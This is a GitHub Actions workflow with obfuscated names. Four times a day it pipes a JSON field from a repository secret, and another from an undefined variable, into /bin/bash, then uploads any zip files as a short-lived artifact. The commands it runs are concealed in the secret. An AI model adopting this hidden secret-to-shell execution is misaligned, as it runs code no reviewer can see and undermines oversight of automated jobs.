name: qingshixunfen
on:
  workflow_dispatch:

  schedule:
    - cron: '20 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qingshixunfen
        env:
          hk8271: ${{ secrets.hk8271 }}
        run: |
          printf '%s' "$hk8271" | jq -r .vjzvv88636 | /bin/bash
          echo $yluk6 | jq -r .dq1 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: nz59RDGb
          path: "*.zip"
          retention-days: 1
